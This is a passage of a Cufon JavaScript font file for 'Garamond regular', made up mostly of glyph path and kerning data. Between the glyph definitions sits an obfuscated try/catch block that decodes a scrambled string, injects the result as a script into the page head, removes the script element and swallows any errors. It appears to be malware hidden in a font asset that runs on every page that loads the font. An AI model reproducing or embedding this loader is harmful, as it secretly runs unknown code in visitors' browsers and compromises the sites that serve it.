-219,120r-142,192r145,182v100,127,93,145,171,198v17,11,43,19,76,28v1,18,2,24,-3,40v-12,0,-73,-7,-182,-5r-148,3v-15,0,-34,-1,-57,-2r3,-30v47,-12,119,-14,119,-58v0,-15,-45,-76,-136,-184r-59,-71v-40,34,-104,137,-140,186v-26,35,-50,59,-22,86v6,10,103,28,125,35v4,18,4,20,1,39","w":939,"k":{"\u00f6":39,"o":39,"e":39,"d":39,"c":51}},{"d":"615,178v7,126,98,201,226,229r0,35v-197,-19,-370,-185,-376,-384v-2,-85,48,-241,46,-319v-4,-110,-110,-199,-228,-209r0,-41v120,-11,223,-97,228,-209v3,-77,-48,-234,-46,-319v5,-197,180,-366,376,-383r0,35v-129,28,-219,101,-226,228v-5,80,50,241,45,323v-10,172,-135,291,-295,343v157,53,285,176,295,348v4,82,-49,243,-45,323","w":981},{"d":"147,-913r1072,0r0,88r-1072,0r0,-88xm147,-450r1072,0r0,89r-1072,0r0,-89","w":1365},{"d":"113,-1426r87,0r711,1703r-88,0","w":1024},{"d":"460,-941v89,-61,161,-110,307,-186r38,67r-315,165r223,120v33,14,63,31,90,51v-11,19,-24,41,-40,65v-76,-41,-233,-157,-303,-187r-1,28v0,134,2,221,7,261v3,23,5,44,5,64v-31,1,-42,2,-77,-5r6,-340v-27,13,-68,38,-123,74v-55,36,-116,71,-182,104r-36,-65v30,-23,130,-75,299,-158r12,-9r-148,-87v-11,-7,-62,-35,-154,-84v11,-25,24,-49,37,-70v159,108,257,172,292,191r2,-242v0,-34,-2,-70,-5,-109v27,-1,53,-1,77,0r-15,314v0,9,1,21,4,38","w":875}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-141-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("9h.O)GeY8(?u9^WE5G4Zoho?|6eO.G?u|6aZ8(7X.m-zs$Y:s4Y6|RMUAhs6|RMUAhAT|RMUAh.0Md*[5;SU.;4[5;SUs67[5;SUsdJ[5;SU.;e[5;SUs(a[5;SUs;e[5;SU.d7[5;SU.(4[5;SUs$J;imIOAVJy]hej|RMUAhm:|RMUAhgk|RMUAhoI|RMUAhMO|RMUAhA,|RMUAhsT5mIOAVJyAmIOAVJ0emIOAVJW]mIOAVJ0eWIOAVJ0AmIOAVJW]4IOAVJG]2gz)GW[5;SU.d4G)4,[5;SU.(m6|RMUAh7:|RMUAhMY;OIOAVJ:AOIOAVJG.^0[5;SUsG4[5;SU.hm[5;SUs;y@|RMUAh7G|RMUAhg,|RMUAh4G|RMUAhoZ|RMUAhMk24IOAVJyAVa[5;SUs$e[5;SUsdW[5;SU.(e7|RMUAhAO|RMUAhoTa2*(|RMUAhM62WIOAVJG.mIOAVJGAOIOAVJGAWIOAVJdsWIOAVJ0]4IOAVJ:.WU:|RMUAhAk|RMUAhe0|RMUAhg$|RMUAh4y|RMUAh70|RMUAhgY|RMUAheW|RMUAh40|RMUAhgZomIOAVJd.dW[5;SU.SJ^VP4hRoa9KAe]+g72;Mm(|s.8)[5iLn0:dyWGXDv_jz*uBUIZ$YO6kT,fE-?@N(7[5;SUs;Sk.R,R|RMUAh4W+Vv[5;SUs$4m|RMUAh.:]4IOAVJ:sYW[5;SUsGM$.mIOAVJG.yYuAP.I84IOAVJyemIOAVJGeOnY|RMUAhAZ7|5f|RMUAha:9mIOAVJ:e6v*|RMUAhedAM4[5;SU.(.[5;SUs;o*[YeB|RMUAhsU[WIOAVJde:e^74UBgP,[5;SU.V.[5;SUsd.[5;SU.h7:[RI[5;SUs$7K|RMUAhay(2.X|RMUAh4d|RMUAhPYo4JY|RMUAhoYsmIOAVAk.mv[5;SU.;J[5;SU.;oOmOIOAVJ:emIOAVJGsZ5?(O?[5;SU.he[5;SU.dmM|RMUAhPk;V?Ti$O[|^D:KXeU)hWY9^o:92Iv+;Sz[VO:KXSz)VOUKGIW)G5Y8^IX+(ou.:,X)RWU8RA?ikYE8(sDs:,B8$YB|:nN]X5k5OUu9;-D+$Du9OUusGIO.G?Zs6m[KG4YL^Tj|^,X)6m$[6I[KGeB)|Uu9OUu.k50)G7Ds|m$|^,d)6Yva^?vKX7W[kgD)h?ds|7v)6Tu8h?$5h,0)(Mv9(.B[:nE8;Iz]Zzj82WX(6e)8mO5+|J)8mO?92nv")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":1045,"face":{"font-family":"Garamond regular","font-weight":400,"font-stretch":"normal","units-per-em":"2048","panose-1":"2 2 4 4 3 3 1 1 8 3","ascent":"1638","descent":"-410","x-height":"27","bbox":"-173.082 -1761 1836 539","underline-thickness":"102","underline-position":"-103","unicode-range":"U+0020-U+00FF"}}));Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"312,-489v0,228,165,420,393,351v38,-11,71,-39,109,-82r42,-47v25,14,45,19,61,37v-39,140,-199,252,-394,246v-255,-8,-444,-158,-444,-414v0,-282,211,-462,515,-462v115,0,196,18,241,54v45,36,68,72,68,108v0,102,-105,144,-179,87v-57,-44,-58,-183,-170,-178v-139,6,-242,137,-242,300","k":{".":-18,",":-35}},{"d":"632,-810v110,0,221,1,331,-10v2,27,3,33,1,56v-36,20,-106,17,-123,51v-31,64,-101,263,-141,359r-167,398v-64,134,-113,291,-204,395v-67,76,-284,59,-284,-53v0,-37,16,-71,47,-102v71,-47,98,-28,167,21v32,22,54,37,72,4v60,-111,95,-193,112,-240r-185,-407v-69,-163,-124,-277,-159,-343v-35,-66,-43,-62,-105,-87r-9,-44v94,-15,183,7,285,1r142,-8v5,4,10,8,14,13v-2,29,-4,48,-5,56r-81,14v-30,5,-8,39,-5,54r48,98v55,138,113,249,173,373v9,-30,184,-447,173,-470v0,-7,-2,-18,-6,-33v-32,-32,-77,-22,-133,-39v-4,-20,-6,-31,-1,-55v20,-1,34,-2,43,-2xm374,-959v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1"},{"w":512},{"d":"361,-733v3,-91,-58,-263,-53,-334v11,-158,130,-266,266,-302v36,-10,85,-16,146,-18r0,45v-112,19,-189,79,-195,188v-4,87,52,250,48,340v-5,113,-74,206,-157,259v-36,23,-92,45,-169,66v153,47,228,90,291,197v26,45,37,90,37,131v0,81,-53,248,-49,334v6,115,78,173,194,194r0,47v-216,18,-402,-125,-413,-317v-5,-79,57,-253,54,-348v-3,-118,-82,-189,-196,-206r0,-61v116,-17,192,-93,196,-215","w":811},{"d":"817,-238v-5,58,7,123,60,98r30,-47r18,-7v13,10,33,16,35,37v-28,99,-59,156,-160,156v-104,0,-139,-57,-179,-147v-56,99,-159,148,-312,153v-149,5,-242,-96,-187,-225v68,-158,310,-197,476,-275v8,-91,0,-225,-30,-261v-52,-63,-198,-15,-223,38v-15,12,-26,113,-37,134v-12,22,-88,47,-108,57v-36,18,-65,26,-86,26v-30,-32,-8,-99,10,-132v42,-72,160,-162,244,-189v91,-30,261,-48,348,2v96,55,99,122,102,296r-3,165xm349,-192v0,52,38,99,86,99v70,0,143,-69,157,-101v9,-20,12,-172,5,-232v-70,23,-195,94,-228,153v-13,22,-20,49,-20,81","w":981,"k":{"w":20,"v":23,"g":-37,"b":39}},{"d":"1556,-689r-2,426v34,0,57,2,93,-1r0,99r-94,1r-3,172v-54,1,-95,-5,-148,3r-1,-175r-247,-2v-9,0,-22,1,-39,2r0,-86v34,-55,184,-257,233,-312v39,-44,72,-87,101,-127v41,-1,59,-3,107,0xm1403,-264v5,-84,-1,-177,3,-266v-35,38,-149,191,-197,264xm373,26r887,-1362v33,-8,77,4,114,0r-889,1362v-42,3,-75,-7,-112,0xm266,-736r3,-204v-3,-35,-2,-90,-2,-119r2,-135v-41,25,-88,48,-142,69v-13,-17,-25,-31,-32,-49v101,-44,159,-84,218,-147r114,0v10,73,2,146,1,226r-4,345v1,55,-1,49,41,56v10,2,32,4,67,10v4,21,4,25,1,45r-154,-3r-230,4v-1,-22,-1,-24,0,-45v54,-15,79,-11,109,-25v6,-5,8,-15,8,-28","w":1707},{"d":"475,-1320r159,0r0,1830r-159,0r0,-1830","w":1109},{"d":"679,-613v-48,-2,-102,-4,-147,7r-4,88r2,345v0,17,1,35,3,53r10,6r147,23v16,6,28,6,39,14v4,34,4,35,-1,67r-119,-1r-302,-10v-92,5,-117,11,-243,11v0,-20,2,-44,6,-71v64,-13,122,-17,180,-38r13,-250r-3,-226v5,-78,2,-334,2,-449v0,-44,1,-114,-17,-160v-52,-13,-126,-15,-176,-29v-4,-40,-5,-38,3,-70v137,-13,266,12,390,12v32,0,202,-23,269,-11v2,32,2,39,-3,69r-176,28v-42,18,-19,73,-19,126r-1,215v-2,55,-5,67,0,136v189,17,416,9,622,5v23,0,47,-2,72,-7v2,-17,7,-145,5,-212r-6,-170v-7,-29,4,-71,-21,-83v-21,-16,-116,-38,-176,-55v1,-23,4,-42,8,-57r124,0v148,20,317,-3,463,-3v19,0,43,1,70,3v-1,26,-2,50,-5,71v-101,22,-115,21,-178,51v-19,156,-10,356,-8,533r5,440v0,22,-1,49,-2,80v62,16,145,33,181,51r3,70v-203,1,-392,-1,-633,-1v-9,0,-21,-2,-34,-6v1,-31,2,-52,5,-65v60,-17,129,-23,189,-40v13,-96,15,-342,7,-481v-25,-2,-51,-3,-80,-4","w":1771},{"d":"680,-1167v52,0,98,45,98,98v0,52,-46,98,-98,98v-53,0,-98,-46,-98,-98v0,-53,45,-98,98,-98xm135,-726r1096,0r0,150r-1096,0r0,-150xm681,-340v53,0,99,46,99,99v0,53,-46,99,-99,99v-53,0,-99,-46,-99,-99v0,-53,46,-99,99,-99","w":1365},{"d":"540,-858v212,0,357,113,422,266v49,116,36,273,-10,367v-73,151,-204,238,-411,242v-198,4,-354,-108,-419,-229v-48,-91,-63,-240,-25,-356v44,-135,151,-229,279,-270v45,-14,100,-20,164,-20xm319,-389v0,158,10,170,54,258v40,79,216,114,291,33v72,-78,87,-176,86,-359v0,-121,-22,-205,-60,-257v-62,-85,-204,-101,-286,-33v-34,29,-57,71,-70,127v-9,36,-15,113,-15,231xm313,-1280r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":1067},{"d":"893,-229v-47,172,-286,290,-522,226r-124,352r-67,2r131,-372v-134,-73,-179,-107,-227,-228v-77,-197,17,-405,139,-495v108,-80,184,-114,382,-113r120,-340r67,-1r-118,345v62,12,122,30,160,67v71,69,48,204,-57,201v-83,-2,-115,-69,-145,-148r-200,557v50,35,103,52,158,52v132,0,169,-51,239,-141v24,7,45,19,64,36xm527,-790v-141,4,-245,139,-240,306v3,114,33,198,93,263r197,-559v-16,-7,-33,-10,-50,-10"},{"d":"414,-8v-91,-8,-300,-2,-377,11r-1,-54v31,-17,81,-25,109,-50v17,-38,11,-57,11,-125r-3,-610v0,-191,39,-325,125,-394v91,-74,150,-97,296,-97v174,0,313,49,377,166v44,79,29,173,-15,239v-25,40,-80,83,-140,115v-58,31,-95,45,-105,51v-4,38,18,33,54,48v49,20,170,94,209,139v85,97,138,271,52,409v-57,91,-133,164,-280,164v-130,0,-215,-47,-223,-146v-5,-71,91,-119,147,-69v33,29,20,125,57,150v32,7,49,2,63,-25v43,-84,39,-402,-24,-483v-23,-29,-53,-59,-96,-89v-50,-34,-72,-52,-64,-95v12,-22,87,-68,101,-88v38,-55,57,-97,61,-182v9,-182,-147,-309,-301,-214v-88,55,-82,137,-80,308r6,413r-2,142v5,77,2,160,2,241v0,16,3,27,9,33v6,6,30,18,72,38v6,19,7,30,5,51v-23,2,-38,3,-45,3","w":1109},{"d":"557,-1135v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm540,-858v212,0,357,113,422,266v49,116,36,273,-10,367v-73,151,-204,238,-411,242v-198,4,-354,-108,-419,-229v-48,-91,-63,-240,-25,-356v44,-135,151,-229,279,-270v45,-14,100,-20,164,-20xm319,-389v0,158,10,170,54,258v40,79,216,114,291,33v72,-78,87,-176,86,-359v0,-121,-22,-205,-60,-257v-62,-85,-204,-101,-286,-33v-34,29,-57,71,-70,127v-9,36,-15,113,-15,231","w":1067},{"d":"543,-809r-8,658v0,20,3,33,10,39r95,4v187,7,384,-7,465,-92v54,-56,71,-86,104,-181v32,0,54,0,86,4v2,71,-12,269,-32,368v-158,14,-202,-6,-428,-10v-114,-2,-226,-9,-335,-6r-204,6r-255,10v-5,-27,0,-66,5,-80v23,-8,129,-25,154,-26v26,-1,43,-5,52,-13v13,-52,2,-109,4,-168r6,-130r-1,-285v0,-136,14,-348,-9,-453v-33,-29,-148,-51,-189,-77v-2,-30,-3,-36,-1,-64v41,-13,71,3,193,3r249,1v47,1,150,-6,214,-12v39,-4,34,64,18,83v-47,20,-137,26,-185,49v-18,55,-15,144,-13,213","w":1301,"k":{"y":39,"w":39,"Y":76,"W":39,"V":57,"T":39}},{"d":"539,-957v-87,0,-165,-79,-165,-166v0,-89,75,-167,165,-167v91,0,167,76,167,166v0,90,-76,167,-167,167xm450,-1124v0,48,41,90,89,90v49,0,91,-42,91,-90v0,-48,-42,-90,-89,-90v-49,0,-91,41,-91,90xm817,-238v-5,58,7,123,60,98r30,-47r18,-7v13,10,33,16,35,37v-28,99,-59,156,-160,156v-104,0,-139,-57,-179,-147v-56,99,-159,148,-312,153v-149,5,-242,-96,-187,-225v68,-158,310,-197,476,-275v8,-91,0,-225,-30,-261v-52,-63,-198,-15,-223,38v-15,12,-26,113,-37,134v-12,22,-88,47,-108,57v-36,18,-65,26,-86,26v-30,-32,-8,-99,10,-132v42,-72,160,-162,244,-189v91,-30,261,-48,348,2v96,55,99,122,102,296r-3,165xm349,-192v0,52,38,99,86,99v70,0,143,-69,157,-101v9,-20,12,-172,5,-232v-70,23,-195,94,-228,153v-13,22,-20,49,-20,81","w":981,"k":{"w":20,"v":23}},{"d":"258,-137v17,-49,8,-105,7,-163r-3,-281r-11,-317v-5,-151,-8,-232,-11,-244v-12,-43,-31,-60,-81,-69v-55,-9,-92,-17,-110,-23r-1,-76v237,21,448,15,676,0r-1,76v-21,12,-152,18,-172,52v-27,28,-25,120,-23,182r235,-9v161,0,276,39,343,117v67,78,100,157,100,238v0,228,-168,392,-393,392v-76,0,-169,-23,-278,-68v0,81,-6,131,4,215r199,25v6,36,5,44,-1,80v-99,13,-224,-11,-351,-11v-108,0,-194,13,-296,21v-4,-35,-5,-39,-2,-71v58,-19,125,-38,170,-66xm678,-395v146,0,225,-93,225,-245v0,-201,-118,-302,-321,-270v-29,5,-48,16,-54,42r4,173r2,285v63,10,111,15,144,15","w":1259},{"d":"120,-1426r166,0r726,1703r-167,0","w":1131},{"d":"589,-1135v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm745,-148v-96,81,-171,163,-318,164v-107,1,-196,-50,-230,-118v-43,-86,-29,-153,-29,-340v0,-65,5,-114,5,-145v0,-78,6,-97,-13,-137v-40,-22,-133,-2,-116,-59v1,-7,2,-18,3,-33v7,-3,13,-5,18,-6r320,2r-1,470v-3,149,10,241,141,248v86,5,143,-43,184,-79v22,-19,33,-41,40,-59r9,-313r-4,-169v-28,-20,-87,-20,-134,-24v-14,-1,-15,-28,-15,-37v0,-8,1,-19,3,-34v122,-12,224,3,363,-5r-1,592v-3,35,-4,54,-4,59v-1,25,10,48,26,49v34,2,72,-5,104,-1v3,41,5,33,0,62v-133,6,-190,40,-310,78r-40,-2","w":1131},{"d":"1706,-15v-63,14,-111,-4,-191,-4v-101,0,-181,3,-240,10v-6,-24,-8,-34,-6,-54v9,-5,37,-16,86,-35v29,-30,20,-52,20,-130v0,-160,22,-367,-45,-472v-42,-66,-155,-79,-236,-30v-38,23,-73,53,-103,96r-2,451v0,105,18,87,111,105r31,11v9,28,11,32,4,60v-173,-2,-302,-23,-479,-3r-18,-3r-1,-59v18,-8,78,-9,121,-19v23,-27,18,-41,18,-103r1,-257v-4,-179,12,-208,-69,-271v-65,-50,-184,-37,-248,8v-53,37,-75,43,-69,106v0,6,-2,15,-5,28r6,463r5,15v36,13,79,17,104,31v5,29,4,32,-5,61v-110,-3,-279,-19,-421,2r-29,-1v-2,-21,-8,-40,1,-63v37,-10,91,-10,116,-26v27,-51,14,-358,14,-487v0,-92,-39,-84,-134,-118r0,-41v127,-28,221,-56,288,-146r55,0r4,151v110,-82,152,-123,304,-123v126,0,222,55,275,148v92,-94,160,-140,318,-145v186,-6,302,126,301,314r-3,405v0,13,4,26,12,39v42,21,70,17,105,36v2,20,6,30,4,50","w":1728,"k":{"y":35}},{"d":"150,17r5,-96v-3,-60,3,-92,4,-156r0,-731v-3,-87,4,-127,-15,-158v-4,-3,-37,-16,-102,-40r0,-46v106,-39,108,-40,252,-115v24,0,53,-1,74,2r4,601v55,-64,168,-134,289,-134v139,0,205,35,279,104v86,79,149,256,98,426v-44,146,-144,259,-288,311v-33,13,-90,19,-171,19v-83,0,-221,-62,-301,-112v-19,27,-62,100,-78,124xm817,-410v2,-205,-153,-390,-363,-297v-40,17,-66,31,-79,44r-1,156v0,173,5,276,12,310v14,64,103,128,181,126v183,-4,248,-164,250,-339","w":1131,"k":{"b":39,".":57,",":39}},{"d":"43,-769v164,-19,206,-51,296,-133r62,1v12,105,10,124,8,246r-7,539v0,7,1,15,4,22v25,6,71,16,140,29v5,27,5,30,1,57r-247,-6v-109,0,-172,1,-190,2v-51,5,-53,8,-76,5r-1,-64v23,-5,121,-13,131,-22v35,-35,28,-58,27,-165r-5,-377v8,-87,-73,-64,-143,-83r0,-51xm181,-959v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1","w":576},{"d":"405,-720v0,93,-69,153,-165,142v-73,-35,-82,-34,-109,-88v-49,-98,33,-201,136,-201v73,0,138,71,138,147xm253,17v-100,0,-175,-128,-115,-219v22,-33,53,-70,122,-68v74,2,148,51,148,138v0,82,-33,105,-76,134v-17,12,-44,15,-79,15","w":533},{"d":"312,-489v0,228,165,420,393,351v38,-11,71,-39,109,-82r42,-47v25,14,45,19,61,37v-39,140,-199,252,-394,246v-255,-8,-444,-158,-444,-414v0,-282,211,-462,515,-462v115,0,196,18,241,54v45,36,68,72,68,108v0,102,-105,144,-179,87v-57,-44,-58,-183,-170,-178v-139,6,-242,137,-242,300xm511,385v74,0,97,-76,46,-121v-15,-26,-101,-48,-145,-75v-18,-30,11,-45,55,-80v30,-23,73,-64,126,-125r108,0v-10,15,-70,69,-75,84v0,5,4,11,11,19v59,69,85,74,88,164v7,197,-308,267,-472,177v-81,-44,5,-136,61,-136v53,0,137,93,197,93"},{"d":"749,-1571v-64,49,-140,125,-220,190r-79,-3r193,-349r214,0r188,353r-78,1xm1075,-609r6,197r-71,0v-9,-36,-37,-174,-51,-182v-41,-43,-60,-34,-188,-34v-101,0,-176,3,-227,8r3,232r-2,216v0,25,9,43,27,52v52,27,393,27,487,0v123,-35,182,-130,231,-255v37,-3,47,-4,84,-2r-11,72r-37,189r-18,114v-221,11,-514,-23,-814,-14r-458,14r0,-69v50,-10,197,-23,220,-43v17,-41,11,-101,11,-162r-2,-490r-5,-160v3,-90,-2,-175,-10,-257v-51,-32,-142,-29,-214,-38r5,-80v177,15,246,26,467,14v149,-8,283,-9,403,-9v141,-1,213,-8,361,13v12,13,18,31,18,54r1,265v-30,1,-40,3,-75,0v-33,-79,-71,-157,-128,-222v-144,-24,-378,-24,-543,-17v-6,82,0,369,-1,491v158,6,307,6,392,-24v47,-46,37,-67,67,-190v22,-2,47,0,71,0v7,129,-3,198,1,317","w":1451},{"d":"1075,-609r6,197r-71,0v-9,-36,-37,-174,-51,-182v-41,-43,-60,-34,-188,-34v-101,0,-176,3,-227,8r3,232r-2,216v0,25,9,43,27,52v52,27,393,27,487,0v123,-35,182,-130,231,-255v37,-3,47,-4,84,-2r-11,72r-37,189r-18,114v-221,11,-514,-23,-814,-14r-458,14r0,-69v50,-10,197,-23,220,-43v17,-41,11,-101,11,-162r-2,-490r-5,-160v3,-90,-2,-175,-10,-257v-51,-32,-142,-29,-214,-38r5,-80v177,15,246,26,467,14v149,-8,283,-9,403,-9v141,-1,213,-8,361,13v12,13,18,31,18,54r1,265v-30,1,-40,3,-75,0v-33,-79,-71,-157,-128,-222v-144,-24,-378,-24,-543,-17v-6,82,0,369,-1,491v158,6,307,6,392,-24v47,-46,37,-67,67,-190v22,-2,47,0,71,0v7,129,-3,198,1,317xm914,-1437v-63,0,-123,-57,-123,-118v0,-72,53,-130,123,-130v67,0,124,57,124,124v0,68,-56,124,-124,124xm453,-1560v0,-67,57,-125,129,-125v62,0,118,61,118,125v0,67,-57,124,-124,124v-68,0,-123,-56,-123,-124","w":1451},{"d":"261,-567v-79,0,-141,-65,-141,-146v0,-88,76,-145,143,-146v78,-2,145,72,145,153v0,69,-76,139,-147,139xm254,488v-78,0,-132,-65,-129,-153v10,-221,83,-689,102,-783v25,-2,51,-3,78,-3r71,501v16,111,24,207,24,286v-1,107,-41,152,-146,152","w":533},{"d":"195,-537r28,-663v-2,-37,-6,-63,31,-70v59,-11,294,-2,390,-2v68,0,77,0,98,-41r73,0v-28,134,-48,212,-61,233v-8,13,-16,22,-24,22r-218,6r-203,-4v-10,88,-7,172,-13,264v90,-46,231,-58,336,-13v93,40,152,97,203,189v18,32,28,56,30,72v20,119,14,140,-5,234v-15,78,-117,212,-173,249v-94,61,-187,82,-342,83v-90,0,-165,-22,-226,-65v-36,-26,-54,-59,-54,-98v-1,-57,51,-105,109,-105v47,0,95,30,144,91v50,62,62,86,142,86v140,0,231,-136,235,-271v5,-163,-152,-298,-331,-244v-27,8,-90,69,-137,74v-17,2,-33,-8,-32,-27"},{"d":"738,-1171v56,0,66,-30,81,-89r58,1v3,150,-79,256,-209,263v-107,6,-213,-86,-308,-86v-59,0,-71,28,-87,84r-59,1v-12,-140,84,-257,205,-261v116,-4,213,87,319,87xm540,-858v212,0,357,113,422,266v49,116,36,273,-10,367v-73,151,-204,238,-411,242v-198,4,-354,-108,-419,-229v-48,-91,-63,-240,-25,-356v44,-135,151,-229,279,-270v45,-14,100,-20,164,-20xm319,-389v0,158,10,170,54,258v40,79,216,114,291,33v72,-78,87,-176,86,-359v0,-121,-22,-205,-60,-257v-62,-85,-204,-101,-286,-33v-34,29,-57,71,-70,127v-9,36,-15,113,-15,231","w":1067},{"d":"671,-1311v-87,0,-165,-79,-165,-166v0,-89,75,-167,165,-167v91,0,167,76,167,166v0,90,-76,167,-167,167xm582,-1478v0,48,41,90,89,90v49,0,91,-42,91,-90v0,-48,-42,-90,-89,-90v-49,0,-91,41,-91,90xm404,-464v-8,22,-85,207,-106,307v4,56,41,51,102,64v6,1,30,5,71,11v0,38,3,46,-1,73v-41,0,-140,-6,-296,-17v-63,12,-133,21,-200,19r2,-68v28,-9,153,-29,160,-42v11,-8,29,-26,41,-58r439,-1151r108,1r183,430v39,87,73,173,106,255r136,342v14,37,56,143,85,177v35,25,98,20,146,43v5,35,6,41,4,71v-94,1,-230,-15,-323,-14v-53,0,-91,1,-114,2r-219,11v0,-23,1,-46,3,-67v48,-11,138,-26,169,-44v14,-13,13,-31,5,-50r-119,-294xm444,-569r301,2v-33,-101,-115,-303,-156,-388","w":1344,"k":{"y":20,"w":20,"v":39,"Y":20,"W":23,"V":115,"U":39}},{"d":"387,-8v-107,-15,-256,-7,-367,1r-1,-45v104,-38,119,-54,201,-135r196,-196v-4,-3,-48,-39,-119,-117r-101,-109v-48,-51,-78,-87,-96,-102v-4,-5,-53,-29,-73,-40v-7,-28,-14,-66,12,-69v133,13,268,-3,419,-1v3,27,3,34,-6,59v-37,15,-85,24,-53,59r161,173r141,-169v13,-21,18,-26,17,-43v-15,-10,-44,-18,-87,-25v-4,-20,-4,-34,-4,-54v94,3,198,15,282,0v19,1,40,1,61,1v0,20,0,33,-6,51v-33,18,-119,36,-136,52v-55,49,-190,194,-220,233r316,367v16,15,38,32,65,50v8,15,6,38,6,60r-226,-9r-208,10v-2,-23,-3,-26,-1,-48v29,-19,57,-28,86,-48v-8,-47,-22,-45,-55,-84v-13,-9,-90,-109,-126,-140v-80,74,-129,125,-150,152v-35,45,-16,91,32,103r45,17v4,20,2,24,-5,46","w":1024,"k":{"\u00f6":35,"o":35,"e":35,"d":35,"c":35}},{"d":"85,-986r320,0r86,-398r143,0r-86,398r401,0r84,-398r143,0r-85,398r189,0r0,143r-216,0r-73,350r289,0r0,143r-317,0r-84,395r-144,0r85,-395r-403,0r-82,395r-144,0r83,-395r-189,0r0,-143r219,0r73,-350r-292,0r0,-143xm520,-843r-73,348r401,0r73,-348r-401,0","w":1365},{"d":"345,-1327v166,0,302,106,303,252v2,169,-124,280,-301,277v-160,-3,-314,-91,-311,-271v3,-154,138,-258,309,-258xm468,-1085v0,-109,-27,-189,-129,-189v-67,0,-100,40,-114,99v-5,21,-9,64,-9,131v0,102,10,133,57,173v17,15,44,20,75,20v108,0,120,-106,120,-234","w":683},{"d":"1075,-609r6,197r-71,0v-9,-36,-37,-174,-51,-182v-41,-43,-60,-34,-188,-34v-101,0,-176,3,-227,8r3,232r-2,216v0,25,9,43,27,52v52,27,393,27,487,0v123,-35,182,-130,231,-255v37,-3,47,-4,84,-2r-11,72r-37,189r-18,114v-221,11,-514,-23,-814,-14r-458,14r0,-69v50,-10,197,-23,220,-43v17,-41,11,-101,11,-162r-2,-490r-5,-160v3,-90,-2,-175,-10,-257v-51,-32,-142,-29,-214,-38r5,-80v177,15,246,26,467,14v149,-8,283,-9,403,-9v141,-1,213,-8,361,13v12,13,18,31,18,54r1,265v-30,1,-40,3,-75,0v-33,-79,-71,-157,-128,-222v-144,-24,-378,-24,-543,-17v-6,82,0,369,-1,491v158,6,307,6,392,-24v47,-46,37,-67,67,-190v22,-2,47,0,71,0v7,129,-3,198,1,317xm505,-1716r273,0v16,41,34,103,47,143v31,90,49,149,56,178r-79,-3","w":1451},{"d":"892,-167v-104,112,-206,181,-394,184v-227,3,-338,-113,-401,-274v-38,-98,-32,-183,-11,-279v29,-131,94,-177,166,-241v112,-100,351,-105,470,-24v100,68,163,145,169,304r-111,-2v-22,2,-215,-13,-282,-13r-194,1v-10,174,64,314,194,361r58,19v152,1,185,-24,276,-83v24,17,44,33,60,47xm537,-574v34,1,93,-9,130,-5v-1,-116,-66,-215,-176,-215v-103,0,-179,104,-182,219xm374,-959v21,-73,55,-180,102,-321r274,3r-301,319v-45,1,-42,2,-75,-1"},{"d":"679,-1133v106,0,187,34,260,80r130,-131r121,124r-129,130v105,163,106,354,0,518r129,128r-121,123r-130,-128v-73,47,-154,80,-263,80v-104,0,-186,-34,-257,-80r-128,128r-124,-123r130,-128v-106,-163,-107,-354,0,-519r-130,-129r121,-124r131,131v74,-46,154,-80,260,-80xm967,-671v0,-156,-132,-288,-288,-288v-156,0,-289,132,-289,288v0,156,133,289,289,289v156,0,288,-133,288,-289","w":1408},{"d":"268,-74v63,46,212,26,321,26v159,0,271,25,335,76v95,74,125,191,62,302v-102,180,-466,215,-724,157v-71,-16,-125,-47,-166,-85v-57,-54,-62,-127,-8,-182v26,-26,93,-56,201,-92v-90,-23,-149,-51,-180,-80v-47,-44,-63,-123,-21,-170v15,-17,89,-61,219,-135v-146,-78,-238,-211,-158,-390v63,-141,196,-201,405,-203v95,-1,145,12,215,44v36,17,64,43,89,66v84,-13,130,-40,203,-46v42,6,43,34,44,97v1,70,-20,118,-81,84v-43,-24,-82,-32,-109,-33v16,46,24,90,24,131v0,249,-305,348,-553,279v-57,31,-96,58,-119,80v-22,21,-24,55,1,74xm701,-510v0,-196,-44,-292,-215,-265v-77,12,-132,115,-127,226v1,25,7,133,22,166v30,65,74,109,158,109v109,0,162,-101,162,-236xm232,305v0,133,207,155,364,140v99,-9,174,-40,230,-80v70,-50,62,-121,2,-165v-68,-50,-205,-41,-323,-41v-108,0,-180,13,-217,40v-37,27,-56,62,-56,106","w":1109,"k":{"y":-68,"r":-33,"l":20,"g":35,".":141,",":35}},{"d":"396,-641r-5,445v4,68,-6,95,31,117v40,4,71,1,101,8v3,34,3,39,-2,69r-224,-10r-140,7r-98,-1v-6,-11,-21,-33,-21,-63v5,-5,115,-8,129,-26v22,-95,14,-265,15,-386r4,-391v0,-124,-1,-201,-10,-230v-17,-55,-49,-52,-134,-69r2,-58v112,-26,201,-39,301,-95r54,4r-2,598v102,-78,175,-132,322,-132v147,0,244,71,265,194v24,143,8,391,5,559v6,26,75,21,110,35v14,24,4,33,5,65v-75,1,-149,-13,-223,-11r-211,6v-7,0,-14,-1,-20,-3v2,-25,-6,-38,3,-59v29,-15,75,-16,111,-22v17,-122,10,-274,10,-415v0,-127,4,-168,-62,-211v-104,-68,-254,11,-316,75","w":1131,"k":{"y":35}},{"d":"404,-464v-8,22,-85,207,-106,307v4,56,41,51,102,64v6,1,30,5,71,11v0,38,3,46,-1,73v-41,0,-140,-6,-296,-17v-63,12,-133,21,-200,19r2,-68v28,-9,153,-29,160,-42v11,-8,29,-26,41,-58r439,-1151r108,1r183,430v39,87,73,173,106,255r136,342v14,37,56,143,85,177v35,25,98,20,146,43v5,35,6,41,4,71v-94,1,-230,-15,-323,-14v-53,0,-91,1,-114,2r-219,11v0,-23,1,-46,3,-67v48,-11,138,-26,169,-44v14,-13,13,-31,5,-50r-119,-294xm444,-569r301,2v-33,-101,-115,-303,-156,-388xm452,-171